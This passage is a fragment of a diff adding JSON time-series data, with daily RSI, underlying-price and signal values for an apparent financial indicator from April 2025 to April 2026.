49.275039881633134 + ], + [ + "2026-01-13", + 36.52475277009829 + ], + [ + "2026-01-14", + 39.79257789257108 + ], + [ + "2026-01-15", + 39.9782466037897 + ], + [ + "2026-01-16", + 25.961074224979917 + ], + [ + "2026-01-20", + 36.70088063358004 + ], + [ + "2026-01-21", + 36.82328502504084 + ], + [ + "2026-01-22", + 38.00007679897349 + ], + [ + "2026-01-23", + 37.5534991851978 + ], + [ + "2026-01-26", + 37.94621828817599 + ], + [ + "2026-01-27", + 40.41427176005081 + ], + [ + "2026-01-28", + 39.563222201778004 + ], + [ + "2026-01-29", + 40.73366614752425 + ], + [ + "2026-01-30", + 43.30091725074754 + ], + [ + "2026-02-02", + 44.16679324020926 + ], + [ + "2026-02-03", + 50.20821548685122 + ], + [ + "2026-02-04", + 55.49869715417775 + ], + [ + "2026-02-05", + 59.41740156746667 + ], + [ + "2026-02-06", + 71.56155563235505 + ], + [ + "2026-02-09", + 70.59179207947432 + ], + [ + "2026-02-10", + 70.78339399077105 + ], + [ + "2026-02-11", + 71.11178524914791 + ], + [ + "2026-02-12", + 77.59012619229064 + ], + [ + "2026-02-13", + 77.22311488106622 + ], + [ + "2026-02-17", + 77.23937617691227 + ], + [ + "2026-02-18", + 69.29806831415462 + ], + [ + "2026-02-19", + 64.73399898254716 + ], + [ + "2026-02-20", + 65.19367405893584 + ], + [ + "2026-02-23", + 67.57669022051013 + ], + [ + "2026-02-24", + 70.43430707757364 + ], + [ + "2026-02-25", + 73.60247227749402 + ], + [ + "2026-02-26", + 75.47469360490223 + ], + [ + "2026-02-27", + 75.1549513906598 + ], + [ + "2026-03-02", + 72.6765797645119 + ], + [ + "2026-03-03", + 72.9575717063375 + ], + [ + "2026-03-04", + 74.38767913365116 + ], + [ + "2026-03-05", + 67.29979286509511 + ], + [ + "2026-03-06", + 67.98428420488688 + ], + [ + "2026-03-09", + 61.35452631685669 + ], + [ + "2026-03-10", + 59.6492365167552 + ], + [ + "2026-03-11", + 59.192761298214656 + ], + [ + "2026-03-12", + 65.69599626042601 + ], + [ + "2026-03-13", + 56.56398744333067 + ], + [ + "2026-03-16", + 60.09721738644879 + ], + [ + "2026-03-17", + 60.742573537815346 + ], + [ + "2026-03-18", + 64.20724736816481 + ], + [ + "2026-03-19", + 64.10638983723956 + ], + [ + "2026-03-20", + 69.20027736240554 + ], + [ + "2026-03-23", + 70.85692094082732 + ], + [ + "2026-03-24", + 67.93703826441349 + ], + [ + "2026-03-25", + 63.163851202339536 + ], + [ + "2026-03-26", + 72.1725106613284 + ], + [ + "2026-03-27", + 78.44708582086662 + ], + [ + "2026-03-30", + 78.11586250677955 + ], + [ + "2026-03-31", + 100.0 + ], + [ + "2026-04-01", + 98.53021413123085 + ], + [ + "2026-04-02", + 98.66221164017374 + ], + [ + "2026-04-06", + 96.24742991307322 + ], + [ + "2026-04-07", + 92.50708130182335 + ], + [ + "2026-04-08", + 100.0 + ], + [ + "2026-04-09", + 100.0 + ], + [ + "2026-04-10", + 95.07542222391638 + ], + [ + "2026-04-13", + 95.22572958937315 + ], + [ + "2026-04-14", + 97.98210849688172 + ], + [ + "2026-04-15", + 99.92799313663573 + ], + [ + "2026-04-16", + 95.13746310114317 + ], + [ + "2026-04-17", + 95.5292553934092 + ], + [ + "2026-04-20", + 87.07640716837693 + ], + [ + "2026-04-21", + 87.66358558517051 + ], + [ + "2026-04-22", + 87.24541567480183 + ], + [ + "2026-04-23", + 89.2335853910434 + ] + ], + "rsi": [ + [ + "2025-04-24", + 50.0 + ], + [ + "2025-04-25", + 50.0 + ], + [ + "2025-04-28", + 99.77904550912595 + ], + [ + "2025-04-29", + 99.78946665061417 + ], + [ + "2025-04-30", + 99.69206999530886 + ], + [ + "2025-05-01", + 99.72227710747819 + ], + [ + "2025-05-02", + 99.75239439143158 + ], + [ + "2025-05-05", + 95.24111513791193 + ], + [ + "2025-05-06", + 88.52131568247708 + ], + [ + "2025-05-07", + 88.8747754438778 + ], + [ + "2025-05-08", + 89.77043014815035 + ], + [ + "2025-05-09", + 89.27409222848104 + ], + [ + "2025-05-12", + 92.1703995047757 + ], + [ + "2025-05-13", + 92.96670823108416 + ], + [ + "2025-05-14", + 93.2613593008852 + ], + [ + "2025-05-15", + 93.31697970197546 + ], + [ + "2025-05-16", + 93.54448951237447 + ], + [ + "2025-05-19", + 93.5964323616332 + ], + [ + "2025-05-20", + 90.85678645728655 + ], + [ + "2025-05-21", + 80.33455263133895 + ], + [ + "2025-05-22", + 80.65491616209702 + ], + [ + "2025-05-23", + 74.2003922658428 + ], + [ + "2025-05-27", + 78.79894956377562 + ], + [ + "2025-05-28", + 75.98646871962188 + ], + [ + "2025-05-29", + 76.38724952233486 + ], + [ + "2025-05-30", + 75.29928842142172 + ], + [ + "2025-06-02", + 77.05874046462012 + ], + [ + "2025-06-03", + 78.68941848337363 + ], + [ + "2025-06-04", + 79.26005363175571 + ], + [ + "2025-06-05", + 73.5200150706181 + ], + [ + "2025-06-06", + 75.938769176498 + ], + [ + "2025-06-09", + 76.2933988628514 + ], + [ + "2025-06-10", + 77.87352174343464 + ], + [ + "2025-06-11", + 75.10861574881878 + ], + [ + "2025-06-12", + 75.75246114331287 + ], + [ + "2025-06-13", + 65.91166359437841 + ], + [ + "2025-06-16", + 70.43649689119421 + ], + [ + "2025-06-17", + 63.93990388568909 + ], + [ + "2025-06-18", + 63.83033997192954 + ], + [ + "2025-06-20", + 61.12430855414887 + ], + [ + "2025-06-23", + 65.11833916739269 + ], + [ + "2025-06-24", + 70.09047071697653 + ], + [ + "2025-06-25", + 70.8499421269355 + ], + [ + "2025-06-26", + 73.50664090407867 + ], + [ + "2025-06-27", + 74.43398727686142 + ], + [ + "2025-06-30", + 76.14132242834225 + ], + [ + "2025-07-01", + 69.586075991525 + ], + [ + "2025-07-02", + 71.73339607010487 + ], + [ + "2025-07-03", + 74.49241445411319 + ], + [ + "2025-07-07", + 68.89412817813755 + ], + [ + "2025-07-08", + 69.07927231111775 + ], + [ + "2025-07-09", + 71.39224024381994 + ], + [ + "2025-07-10", + 70.23466626043084 + ], + [ + "2025-07-11", + 68.36913533457026 + ], + [ + "2025-07-14", + 69.76004713250406 + ], + [ + "2025-07-15", + 70.11899292617309 + ], + [ + "2025-07-16", + 70.54001173117108 + ], + [ + "2025-07-17", + 73.69759002094732 + ], + [ + "2025-07-18", + 72.69300226978105 + ], + [ + "2025-07-21", + 74.69496472771927 + ], + [ + "2025-07-22", + 69.21176206947568 + ], + [ + "2025-07-23", + 71.20734795480958 + ], + [ + "2025-07-24", + 72.11954053767371 + ], + [ + "2025-07-25", + 73.15753951282366 + ], + [ + "2025-07-28", + 74.48881229730004 + ], + [ + "2025-07-29", + 72.5620120511779 + ], + [ + "2025-07-30", + 73.20655233427698 + ], + [ + "2025-07-31", + 66.5393114926778 + ], + [ + "2025-08-01", + 48.83041478425206 + ], + [ + "2025-08-04", + 59.491477116591874 + ], + [ + "2025-08-05", + 54.87712074671254 + ], + [ + "2025-08-06", + 60.89049411230994 + ], + [ + "2025-08-07", + 62.36157525047321 + ], + [ + "2025-08-08", + 66.15352297971708 + ], + [ + "2025-08-11", + 63.932727450770486 + ], + [ + "2025-08-12", + 68.72177150341022 + ], + [ + "2025-08-13", + 68.900932111759 + ], + [ + "2025-08-14", + 68.24779460146516 + ], + [ + "2025-08-15", + 64.51594474267432 + ], + [ + "2025-08-18", + 64.17502480696504 + ], + [ + "2025-08-19", + 53.761392916963 + ], + [ + "2025-08-20", + 49.990345714718565 + ], + [ + "2025-08-21", + 47.225115126401526 + ], + [ + "2025-08-22", + 55.932132688386346 + ], + [ + "2025-08-25", + 54.106885564199445 + ], + [ + "2025-08-26", + 56.24119734238294 + ], + [ + "2025-08-27", + 57.06761545369084 + ], + [ + "2025-08-28", + 60.356581162153155 + ], + [ + "2025-08-29", + 52.324230113335304 + ], + [ + "2025-09-02", + 47.4573144009636 + ], + [ + "2025-09-03", + 51.93916215372515 + ], + [ + "2025-09-04", + 56.56568877482158 + ], + [ + "2025-09-05", + 57.278130609688844 + ], + [ + "2025-09-08", + 59.68880660149724 + ], + [ + "2025-09-09", + 61.06948498777925 + ], + [ + "2025-09-10", + 61.23516986174764 + ], + [ + "2025-09-11", + 64.15707209533886 + ], + [ + "2025-09-12", + 66.24833019406043 + ], + [ + "2025-09-15", + 69.92519021698152 + ], + [ + "2025-09-16", + 69.11751021042838 + ], + [ + "2025-09-17", + 67.14646866878539 + ], + [ + "2025-09-18", + 71.1422428350205 + ], + [ + "2025-09-19", + 73.74698644339799 + ], + [ + "2025-09-22", + 75.81669513657158 + ], + [ + "2025-09-23", + 69.18694468585738 + ], + [ + "2025-09-24", + 65.92748004035793 + ], + [ + "2025-09-25", + 62.07343396388003 + ], + [ + "2025-09-26", + 64.21246808743027 + ], + [ + "2025-09-29", + 66.51320688183807 + ], + [ + "2025-09-30", + 67.83641224753137 + ], + [ + "2025-10-01", + 70.07274355087787 + ], + [ + "2025-10-02", + 71.88555909274304 + ], + [ + "2025-10-03", + 67.36702835661829 + ], + [ + "2025-10-06", + 70.87005426879574 + ], + [ + "2025-10-07", + 65.51954978754807 + ], + [ + "2025-10-08", + 70.68180622029047 + ], + [ + "2025-10-09", + 69.4855234823832 + ], + [ + "2025-10-10", + 45.64847638557007 + ], + [ + "2025-10-13", + 55.376547800705254 + ], + [ + "2025-10-14", + 52.154200792507005 + ], + [ + "2025-10-15", + 55.1143119480304 + ], + [ + "2025-10-16", + 53.23984682248552 + ], + [ + "2025-10-17", + 56.0818988690635 + ], + [ + "2025-10-20", + 61.01108455378205 + ], + [ + "2025-10-21", + 60.85647706566996 + ], + [ + "2025-10-22", + 55.29931627333094 + ], + [ + "2025-10-23", + 58.8005753432155 + ], + [ + "2025-10-24", + 62.818022715158584 + ], + [ + "2025-10-27", + 68.40982510515843 + ], + [ + "2025-10-28", + 70.50895449616502 + ], + [ + "2025-10-29", + 71.70377836481467 + ], + [ + "2025-10-30", + 62.41596171288676 + ], + [ + "2025-10-31", + 63.97724808227697 + ], + [ + "2025-11-03", + 65.51481222422643 + ], + [ + "2025-11-04", + 54.7812181327196 + ], + [ + "2025-11-05", + 57.15571257460462 + ], + [ + "2025-11-06", + 49.14873745521012 + ], + [ + "2025-11-07", + 47.946261839436815 + ], + [ + "2025-11-10", + 56.04169259184099 + ], + [ + "2025-11-11", + 54.910031641928526 + ], + [ + "2025-11-12", + 54.559789224805456 + ], + [ + "2025-11-13", + 46.325446328925906 + ], + [ + "2025-11-14", + 46.640053929393474 + ], + [ + "2025-11-17", + 43.533484536467114 + ], + [ + "2025-11-18", + 39.525954257296995 + ], + [ + "2025-11-19", + 42.29672323381893 + ], + [ + "2025-11-20", + 35.34115491699119 + ], + [ + "2025-11-21", + 38.70476984535196 + ], + [ + "2025-11-24", + 48.58340663842029 + ], + [ + "2025-11-25", + 50.698567451472734 + ], + [ + "2025-11-26", + 53.65962103769292 + ], + [ + "2025-11-28", + 56.27734785219506 + ], + [ + "2025-12-01", + 54.882831472797236 + ], + [ + "2025-12-02", + 57.515448064622284 + ], + [ + "2025-12-03", + 58.33933408567453 + ], + [ + "2025-12-04", + 57.8781407991309 + ], + [ + "2025-12-05", + 59.39219450075155 + ], + [ + "2025-12-08", + 58.32551371522414 + ], + [ + "2025-12-09", + 58.83635741146721 + ], + [ + "2025-12-10", + 60.567119249651505 + ], + [ + "2025-12-11", + 58.46787575447652 + ], + [ + "2025-12-12", + 47.927734585066986 + ], + [ + "2025-12-15", + 45.64566944697319 + ], + [ + "2025-12-16", + 46.7189946185241 + ], + [ + "2025-12-17", + 38.955115100694016 + ], + [ + "2025-12-18", + 46.324802335966496 + ], + [ + "2025-12-19", + 52.01813633981649 + ], + [ + "2025-12-22", + 53.976526806748176 + ], + [ + "2025-12-23", + 55.88033438336896 + ], + [ + "2025-12-24", + 57.080317216643415 + ], + [ + "2025-12-26", + 57.04357023738355 + ], + [ + "2025-12-29", + 54.20813648873114 + ], + [ + "2025-12-30", + 52.858899487878396 + ], + [ + "2025-12-31", + 48.25967910933831 + ], + [ + "2026-01-02", + 47.23107368660708 + ], + [ + "2026-01-05", + 51.76237360928317 + ], + [ + "2026-01-06", + 56.27126587521383 + ], + [ + "2026-01-07", + 56.752355767455775 + ], + [ + "2026-01-08", + 53.03488762083391 + ], + [ + "2026-01-09", + 58.171473864625845 + ], + [ + "2026-01-12", + 58.58195124618075 + ], + [ + "2026-01-13", + 57.49524457198889 + ], + [ + "2026-01-14", + 50.27100328265768 + ], + [ + "2026-01-15", + 52.417257444769845 + ], + [ + "2026-01-16", + 51.85525056479397 + ], + [ + "2026-01-20", + 40.10138771997607 + ], + [ + "2026-01-21", + 48.00508984527319 + ], + [ + "2026-01-22", + 51.74249224890575 + ], + [ + "2026-01-23", + 53.323262932415986 + ], + [ + "2026-01-26", + 55.51699508980897 + ], + [ + "2026-01-27", + 59.734260931895506 + ], + [ + "2026-01-28", + 61.194661716074755 + ], + [ + "2026-01-29", + 57.14693350304284 + ], + [ + "2026-01-30", + 50.0371184807912 + ], + [ + "2026-02-02", + 53.55211498065818 + ], + [ + "2026-02-03", + 45.744065442389456 + ], + [ + "2026-02-04", + 38.90503163789485 + ], + [ + "2026-02-05", + 34.418261499508816 + ], + [ + "2026-02-06", + 44.41022362341338 + ], + [ + "2026-02-09", + 47.592275483915145 + ], + [ + "2026-02-10", + 45.866731199107974 + ], + [ + "2026-02-11", + 47.056288042501706 + ], + [ + "2026-02-12", + 39.88025399484124 + ], + [ + "2026-02-13", + 40.87692124281298 + ], + [ + "2026-02-17", + 40.52643527816032 + ], + [ + "2026-02-18", + 44.25394093272112 + ], + [ + "2026-02-19", + 42.762583900148186 + ], + [ + "2026-02-20", + 47.175317776552305 + ], + [ + "2026-02-23", + 42.30763349258588 + ], + [ + "2026-02-24", + 47.409179148360536 + ], + [ + "2026-02-25", + 53.45408584137357 + ], + [ + "2026-02-26", + 48.39511606773926 + ], + [ + "2026-02-27", + 47.13593783313802 + ], + [ + "2026-03-02", + 47.736733148337834 + ], + [ + "2026-03-03", + 43.41308759909918 + ], + [ + "2026-03-04", + 50.24869061529237 + ], + [ + "2026-03-05", + 48.97034682747825 + ], + [ + "2026-03-06", + 43.09312958733668 + ], + [ + "2026-03-09", + 48.871747086157384 + ], + [ + "2026-03-10", + 48.8787420052744 + ], + [ + "2026-03-11", + 48.82132879625314 + ], + [ + "2026-03-12", + 41.90931509211635 + ], + [ + "2026-03-13", + 39.84725220636975 + ], + [ + "2026-03-16", + 45.30015650507183 + ], + [ + "2026-03-17", + 47.55271769179021 + ], + [ + "2026-03-18", + 42.18317924741783 + ], + [ + "2026-03-19", + 41.066793909392686 + ], + [ + "2026-03-20", + 35.215695568596104 + ], + [ + "2026-03-23", + 40.75717740833905 + ], + [ + "2026-03-24", + 38.614316737573645 + ], + [ + "2026-03-25", + 41.76403626569322 + ], + [ + "2026-03-26", + 34.748648158133264 + ], + [ + "2026-03-27", + 30.360437497040138 + ], + [ + "2026-03-30", + 28.855145904621736 + ], + [ + "2026-03-31", + 42.37827740394505 + ], + [ + "2026-04-01", + 46.50901777113315 + ], + [ + "2026-04-02", + 46.894266887268564 + ], + [ + "2026-04-06", + 48.973590659163925 + ], + [ + "2026-04-07", + 49.028559845141224 + ], + [ + "2026-04-08", + 58.40813808788617 + ], + [ + "2026-04-09", + 60.253506701676805 + ], + [ + "2026-04-10", + 60.65699485820025 + ], + [ + "2026-04-13", + 63.52111182147568 + ], + [ + "2026-04-14", + 67.97449809017962 + ], + [ + "2026-04-15", + 70.9705744657146 + ], + [ + "2026-04-16", + 71.95622681191993 + ], + [ + "2026-04-17", + 74.5013067128034 + ], + [ + "2026-04-20", + 72.75337195151894 + ], + [ + "2026-04-21", + 70.62253213823352 + ], + [ + "2026-04-22", + 74.18999686712169 + ], + [ + "2026-04-23", + 71.01117717323785 + ] + ], + "underlying": [ + [ + "2025-04-24", + 25.888994216918945 + ], + [ + "2025-04-25", + 26.743024826049805 + ], + [ + "2025-04-28", + 26.723161697387695 + ], + [ + "2025-04-29", + 27.244516372680664 + ], + [ + "2025-04-30", + 27.249483108520508 + ], + [ + "2025-05-01", + 28.18791961669922 + ], + [ + "2025-05-02", + 29.508686065673828 + ], + [ + "2025-05-05", + 28.997262954711914 + ], + [ + "2025-05-06", + 28.17302703857422 + ], + [ + "2025-05-07", + 28.500736236572266 + ], + [ + "2025-05-08", + 29.34979820251465 + ], + [ + "2025-05-09", + 29.280284881591797 + ], + [ + "2025-05-12", + 32.825496673583984 + ], + [ + "2025-05-13", + 34.329978942871094 + ], + [ + "2025-05-14", + 34.93574142456055 + ], + [ + "2025-05-15", + 35.044979095458984 + ], + [ + "2025-05-16", + 35.47695541381836 + ], + [ + "2025-05-19", + 35.57129669189453 + ], + [ + "2025-05-20", + 35.19890213012695 + ], + [ + "2025-05-21", + 33.7341423034668 + ], + [ + "2025-05-22", + 33.907928466796875 + ], + [ + "2025-05-23", + 32.92976379394531 + ], + [ + "2025-05-27", + 35.22373580932617 + ], + [ + "2025-05-28", + 34.771888732910156 + ], + [ + "2025-05-29", + 34.940711975097656 + ], + [ + "2025-05-30", + 34.75699234008789 + ], + [ + "2025-06-02", + 35.55640411376953 + ], + [ + "2025-06-03", + 36.3856086730957 + ], + [ + "2025-06-04", + 36.678558349609375 + ], + [ + "2025-06-05", + 35.824527740478516 + ], + [ + "2025-06-06", + 36.847373962402344 + ], + [ + "2025-06-09", + 37.011234283447266 + ], + [ + "2025-06-10", + 37.726234436035156 + ], + [ + "2025-06-11", + 37.33893585205078 + ], + [ + "2025-06-12", + 37.58224105834961 + ], + [ + "2025-06-13", + 36.16217041015625 + ], + [ + "2025-06-16", + 37.63685607910156 + ], + [ + "2025-06-17", + 36.52463150024414 + ], + [ + "2025-06-18", + 36.474979400634766 + ], + [ + "2025-06-20", + 35.973487854003906 + ], + [ + "2025-06-23", + 37.09067153930664 + ], + [ + "2025-06-24", + 38.77886962890625 + ], + [ + "2025-06-25", + 39.076629638671875 + ], + [ + "2025-06-26", + 40.147151947021484 + ], + [ + "2025-06-27", + 40.540504455566406 + ], + [ + "2025-06-30", + 41.32721710205078 + ], + [ + "2025-07-01", + 40.276611328125 + ], + [ + "2025-07-02", + 41.07826232910156 + ], + [ + "2025-07-03", + 42.228450775146484 + ], + [ + "2025-07-07", + 41.287384033203125 + ], + [ + "2025-07-08", + 41.3421516418457 + ], + [ + "2025-07-09", + 42.198577880859375 + ], + [ + "2025-07-10", + 42.00438690185547 + ], + [ + "2025-07-11", + 41.68571853637695 + ], + [ + "2025-07-14", + 42.128868103027344 + ], + [ + "2025-07-15", + 42.238407135009766 + ], + [ + "2025-07-16", + 42.35791015625 + ], + [ + "2025-07-17", + 43.34379196166992 + ], + [ + "2025-07-18", + 43.19441223144531 + ], + [ + "2025-07-21", + 43.851661682128906 + ], + [ + "2025-07-22", + 43.16951370239258 + ], + [ + "2025-07-23", + 43.73714065551758 + ], + [ + "2025-07-24", + 44.025936126708984 + ], + [ + "2025-07-25", + 44.2748908996582 + ], + [ + "2025-07-28", + 44.70808410644531 + ], + [ + "2025-07-29", + 44.50393295288086 + ], + [ + "2025-07-30", + 44.658294677734375 + ], + [ + "2025-07-31", + 43.9213752746582 + ], + [ + "2025-08-01", + 41.287384033203125 + ], + [ + "2025-08-04", + 43.547935485839844 + ], + [ + "2025-08-05", + 42.6417236328125 + ], + [ + "2025-08-06", + 44.23506164550781 + ], + [ + "2025-08-07", + 44.68318557739258 + ], + [ + "2025-08-08", + 45.88814926147461 + ], + [ + "2025-08-11", + 45.48483657836914 + ], + [ + "2025-08-12", + 47.16282272338867 + ], + [ + "2025-08-13", + 47.23252487182617 + ], + [ + "2025-08-14", + 47.10307312011719 + ], + [ + "2025-08-15", + 46.43585968017578 + ], + [ + "2025-08-18", + 46.3761100769043 + ], + [ + "2025-08-19", + 44.4840202331543 + ], + [ + "2025-08-20", + 43.67241287231445 + ], + [ + "2025-08-21", + 43.0649528503418 + ], + [ + "2025-08-22", + 45.001853942871094 + ], + [ + "2025-08-25", + 44.60850143432617 + ], + [ + "2025-08-26", + 45.12633514404297 + ], + [ + "2025-08-27", + 45.330482482910156 + ], + [ + "2025-08-28", + 46.15702438354492 + ], + [ + "2025-08-29", + 44.493980407714844 + ], + [ + "2025-09-02", + 43.358726501464844 + ], + [ + "2025-09-03", + 44.36949920654297 + ], + [ + "2025-09-04", + 45.569480895996094 + ], + [ + "2025-09-05", + 45.7188606262207 + ], + [ + "2025-09-08", + 46.37112808227539 + ], + [ + "2025-09-09", + 46.749549865722656 + ], + [ + "2025-09-10", + 46.799339294433594 + ], + [ + "2025-09-11", + 47.58605194091797 + ], + [ + "2025-09-12", + 48.1785774230957 + ], + [ + "2025-09-15", + 49.40843200683594 + ], + [ + "2025-09-16", + 49.27399444580078 + ], + [ + "2025-09-17", + 48.960304260253906 + ], + [ + "2025-09-18", + 50.27979278564453 + ], + [ + "2025-09-19", + 51.27562713623047 + ], + [ + "2025-09-22", + 52.14200210571289 + ], + [ + "2025-09-23", + 51.09139633178711 + ], + [ + "2025-09-24", + 50.54216766357422 + ], + [ + "2025-09-25", + 49.864349365234375 + ], + [ + "2025-09-26", + 50.46242141723633 + ], + [ + "2025-09-29", + 51.13525390625 + ], + [ + "2025-09-30", + 51.53396987915039 + ], + [ + "2025-10-01", + 52.26162338256836 + ], + [ + "2025-10-02", + 52.899566650390625 + ], + [ + "2025-10-03", + 52.181880950927734 + ], + [ + "2025-10-06", + 53.34812545776367 + ], + [ + "2025-10-07", + 52.48590087890625 + ], + [ + "2025-10-08", + 54.26517105102539 + ], + [ + "2025-10-09", + 54.05086135864258 + ], + [ + "2025-10-10", + 48.37913513183594 + ], + [ + "2025-10-13", + 51.44924545288086 + ], + [ + "2025-10-14", + 50.402610778808594 + ], + [ + "2025-10-15", + 51.43429183959961 + ], + [ + "2025-10-16", + 50.86113739013672 + ], + [ + "2025-10-17", + 51.82802200317383 + ], + [ + "2025-10-20", + 53.771759033203125 + ], + [ + "2025-10-21", + 53.711952209472656 + ], + [ + "2025-10-22", + 52.132041931152344 + ], + [ + "2025-10-23", + 53.437835693359375 + ], + [ + "2025-10-24", + 55.10247039794922 + ], + [ + "2025-10-27", + 58.028045654296875 + ], + [ + "2025-10-28", + 59.35377502441406 + ], + [ + "2025-10-29", + 60.11133575439453 + ], + [ + "2025-10-30", + 57.36019515991211 + ], + [ + "2025-10-31", + 58.17258071899414 + ], + [ + "2025-11-03", + 58.97001266479492 + ], + [ + "2025-11-04", + 55.36164093017578 + ], + [ + "2025-11-05", + 56.438167572021484 + ], + [ + "2025-11-06", + 53.27336502075195 + ], + [ + "2025-11-07", + 52.72014617919922 + ], + [ + "2025-11-10", + 56.17401885986328 + ], + [ + "2025-11-11", + 55.710514068603516 + ], + [ + "2025-11-12", + 55.59588623046875 + ], + [ + "2025-11-13", + 52.161949157714844 + ], + [ + "2025-11-14", + 52.20181655883789 + ], + [ + "2025-11-17", + 50.86113739013672 + ], + [ + "2025-11-18", + 49.022064208984375 + ], + [ + "2025-11-19", + 49.864349365234375 + ], + [ + "2025-11-20", + 46.30083084106445 + ], + [ + "2025-11-21", + 47.327518463134766 + ], + [ + "2025-11-24", + 50.91596603393555 + ], + [ + "2025-11-25", + 51.84297180175781 + ], + [ + "2025-11-26", + 53.1986083984375 + ], + [ + "2025-11-28", + 54.36484909057617 + ], + [ + "2025-12-01", + 53.87641906738281 + ], + [ + "2025-12-02", + 55.12240982055664 + ], + [ + "2025-12-03", + 55.51115417480469 + ], + [ + "2025-12-04", + 55.33173370361328 + ], + [ + "2025-12-05", + 55.96968078613281 + ], + [ + "2025-12-08", + 55.62080001831055 + ], + [ + "2025-12-09", + 55.83012390136719 + ], + [ + "2025-12-10", + 56.468074798583984 + ], + [ + "2025-12-11", + 55.9298095703125 + ], + [ + "2025-12-12", + 52.65037536621094 + ], + [ + "2025-12-15", + 51.852943420410156 + ], + [ + "2025-12-16", + 52.161949157714844 + ], + [ + "2025-12-17", + 49.241355895996094 + ], + [ + "2025-12-18", + 51.34457778930664 + ], + [ + "2025-12-19", + 53.34812545776367 + ], + [ + "2025-12-22", + 54.075782775878906 + ], + [ + "2025-12-23", + 54.83333969116211 + ], + [ + "2025-12-24", + 55.26862335205078 + ], + [ + "2025-12-26", + 55.21870422363281 + ], + [ + "2025-12-29", + 54.40005874633789 + ], + [ + "2025-12-30", + 54.01070022583008 + ], + [ + "2025-12-31", + 52.63298034667969 + ], + [ + "2026-01-02", + 52.263587951660156 + ], + [ + "2026-01-05", + 53.51152420043945 + ], + [ + "2026-01-06", + 54.91919708251953 + ], + [ + "2026-01-07", + 55.07893371582031 + ], + [ + "2026-01-08", + 54.10055160522461 + ], + [ + "2026-01-09", + 55.6679573059082 + ], + [ + "2026-01-12", + 55.79774475097656 + ], + [ + "2026-01-13", + 55.50822448730469 + ], + [ + "2026-01-14", + 53.74114990234375 + ], + [ + "2026-01-15", + 54.29024124145508 + ], + [ + "2026-01-16", + 54.05063247680664 + ], + [ + "2026-01-20", + 50.646263122558594 + ], + [ + "2026-01-21", + 52.64296340942383 + ], + [ + "2026-01-22", + 53.811031341552734 + ], + [ + "2026-01-23", + 54.29024124145508 + ], + [ + "2026-01-26", + 54.98908615112305 + ], + [ + "2026-01-27", + 56.44667434692383 + ], + [ + "2026-01-28", + 56.965816497802734 + ], + [ + "2026-01-29", + 55.9474983215332 + ], + [ + "2026-01-30", + 53.910865783691406 + ], + [ + "2026-02-02", + 55.00904846191406 + ], + [ + "2026-02-03", + 52.43330764770508 + ], + [ + "2026-02-04", + 49.67786407470703 + ], + [ + "2026-02-05", + 47.561363220214844 + ], + [ + "2026-02-06", + 50.50649642944336 + ], + [ + "2026-02-09", + 51.654598236083984 + ], + [ + "2026-02-10", + 50.93578338623047 + ], + [ + "2026-02-11", + 51.31515884399414 + ], + [ + "2026-02-12", + 48.18033981323242 + ], + [ + "2026-02-13", + 48.38999557495117 + ], + [ + "2026-02-17", + 48.27019119262695 + ], + [ + "2026-02-18", + 49.308475494384766 + ], + [ + "2026-02-19", + 48.7494010925293 + ], + [ + "2026-02-20", + 49.97737121582031 + ], + [ + "2026-02-23", + 48.16037368774414 + ], + [ + "2026-02-24", + 49.69783020019531 + ], + [ + "2026-02-25", + 51.78438186645508 + ], + [ + "2026-02-26", + 49.967384338378906 + ], + [ + "2026-02-27", + 49.438262939453125 + ], + [ + "2026-03-02", + 49.61796569824219 + ], + [ + "2026-03-03", + 48.02060317993164 + ], + [ + "2026-03-04", + 50.17703628540039 + ], + [ + "2026-03-05", + 49.717796325683594 + ], + [ + "2026-03-06", + 47.46152877807617 + ], + [ + "2026-03-09", + 49.308475494384766 + ], + [ + "2026-03-10", + 49.318458557128906 + ], + [ + "2026-03-11", + 49.26853942871094 + ], + [ + "2026-03-12", + 46.75270462036133 + ], + [ + "2026-03-13", + 45.85418701171875 + ], + [ + "2026-03-16", + 47.38166046142578 + ], + [ + "2026-03-17", + 48.08050537109375 + ], + [ + "2026-03-18", + 46.023902893066406 + ], + [ + "2026-03-19", + 45.61458206176758 + ], + [ + "2026-03-20", + 43.00889205932617 + ], + [ + "2026-03-23", + 44.496429443359375 + ], + [ + "2026-03-24", + 43.547996520996094 + ], + [ + "2026-03-25", + 44.38999938964844 + ], + [ + "2026-03-26", + 41.22999954223633 + ], + [ + "2026-03-27", + 38.779998779296875 + ], + [ + "2026-03-30", + 37.88999938964844 + ], + [ + "2026-03-31", + 41.68000030517578 + ], + [ + "2026-04-01", + 43.22999954223633 + ], + [ + "2026-04-02", + 43.33000183105469 + ], + [ + "2026-04-06", + 44.099998474121094 + ], + [ + "2026-04-07", + 44.150001525878906 + ], + [ + "2026-04-08", + 48.0 + ], + [ + "2026-04-09", + 48.959999084472656 + ], + [ + "2026-04-10", + 49.16999816894531 + ], + [ + "2026-04-13", + 50.65999984741211 + ], + [ + "2026-04-14", + 53.40999984741211 + ], + [ + "2026-04-15", + 55.650001525878906 + ], + [ + "2026-04-16", + 56.43000030517578 + ], + [ + "2026-04-17", + 58.59000015258789 + ], + [ + "2026-04-20", + 58.08000183105469 + ], + [ + "2026-04-21", + 57.400001525878906 + ], + [ + "2026-04-22", + 60.209999084472656 + ], + [ + "2026-04-23", + 59.220001220703125 + ] + ], + "signal": [ + [ + "2025-04-24", + 465.0987243652344 + ], + [ + "2025-04-25", + 470.28363037109375 + ], + [ + "2025-04-28", + 470.1343688964844 + ], + [ + "2025-04-29", + 473.23931884765625 + ], + [ + "2025-04-30", + 473.1795959472656 + ], + [ + "2025-05-01", + 479.35968017578125 + ], + [ + "2025-05-02", + 486.4752197265625 + ], + [ + "2025-05-05", + 483.5892333984375 + ], + [ + "2025-05-06", + 479.09100341796875 + ], + [ + "2025-05-07", + 480.97186279296875 + ], + [ + "2025-05-08", + 485.9378662109375 + ], + [ + "2025-05-09", + 485.6194152832031 + ], + [ + "2025-05-12", + 505.40362548828125 + ], + [ + "2025-05-13", + 513.1063842773438 + ], + [ + "2025-05-14", + 516.1814575195312 + ], + [ + "2025-05-15", + 516.7487182617188 + ], + [ + "2025-05-16", + 518.997802734375 + ], + [ + "2025-05-19", + 519.4954223632812 + ], + [ + "2025-05-20", + 517.7637939453125 + ], + [ + "2025-05-21", + 510.5686340332031 + ], + [ + "2025-05-22", + 511.5240173339844 + ], + [ + "2025-05-23", + 506.78692626953125 + ], + [ + "2025-05-27", + 518.7091674804688 + ], + [ + "2025-05-28", + 516.4102783203125 + ], + [ + "2025-05-29", + 517.4254150390625 + ], + [ + "2025-05-30", + 516.609375 + ], + [ + "2025-06-02", + 520.689697265625 + ], + [ + "2025-06-03", + 